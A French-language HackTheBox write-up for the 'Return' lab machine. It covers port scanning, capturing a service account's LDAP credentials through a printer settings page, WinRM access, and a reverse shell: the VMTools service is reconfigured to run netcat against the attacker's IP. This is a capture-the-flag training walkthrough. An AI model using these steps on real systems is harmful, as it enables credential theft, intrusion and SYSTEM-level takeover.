Return HackTheBox (Writeup)

Skills:

Network Printer Abuse
Abusing Server Operators Group
Service Configuration Manipulation

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.108 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard.

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389,47001,49664,49665,49666,49668,49671,49674,49675,49679,49682,4969 10.10.11.108 -oN targeted

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP

Port 80:

Network Printer Abuse

Dans les paramètres du port 80, on découvre une configuration de serveur pointant vers print.return.local via le port 389.

Écoute sur le Port 389 En plaçant netcat en écoute sur le port 389

nc -nlvp 389

Une connexion est reçue, révélant les identifiants d’un utilisateur svc-printer avec le mot de passe 1edFg43012!!.

Vérification des Identifiants avec WinRM

Le port WinRM (5985) étant ouvert, on vérifie la validité des identifiants avec crackmapexec :

crackmapexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'

La réponse "pwned" confirme la validité des identifiants.

Connexion via Evil-WinRM

Utilisation de evil-winrm pour obtenir une session shell avec svc-printer :

evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'

Flag user.txt :)

Élévation de privilèges (Integrity Levels):

Integrity Levels - HackTricksbook.hacktricks.xyz

Vérification des Groupes d’Appartenance La commande whoami /groups indique que l’utilisateur appartient au groupe Mandatory Label\High Mandatory Level, ce qui lui permet de gérer les services.

Manipulation de Services pour l'Élévation de Privilèges L'utilisateur peut potentiellement modifier un service et le redémarrer pour exécuter une commande avec des privilèges plus élevés.

Tentative de Création d'un Service Une tentative de création d’un service de reverse shell est effectuée avec sc.exe, mais sans les droits nécessaires :

sc.exe create reverse binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.26 443"

Modification du Service VMTools Pour exploiter un service existant, nc.exe est transféré sur la machine cible, puis le service VMTools est modifié pour exécuter un reverse shell :

Transfert de Netcat

cp /home/jordan/Desktop/htb/artic/scripts/netcat/nc.exe .

upload /home/jordan/Desktop/htb/return/content/nc.exe

L'idée ici est de rediriger l'exécutable d'un service pour qu'il exécute une commande de reverse shell, te donnant ainsi potentiellement une session avec des privilèges élevés si le service s'exécute avec des privilèges SYSTEM.

sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.26 443"

Redémarrage du Service Après configuration, le service est redémarré pour lancer le shell :

sc.exe stop VMTools
sc.exe start VMTools

Mise en écoute sur le port 443 pour capter la connexion entrante :

sudo rlwrap nc -nlvp 443

Flag root :)

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?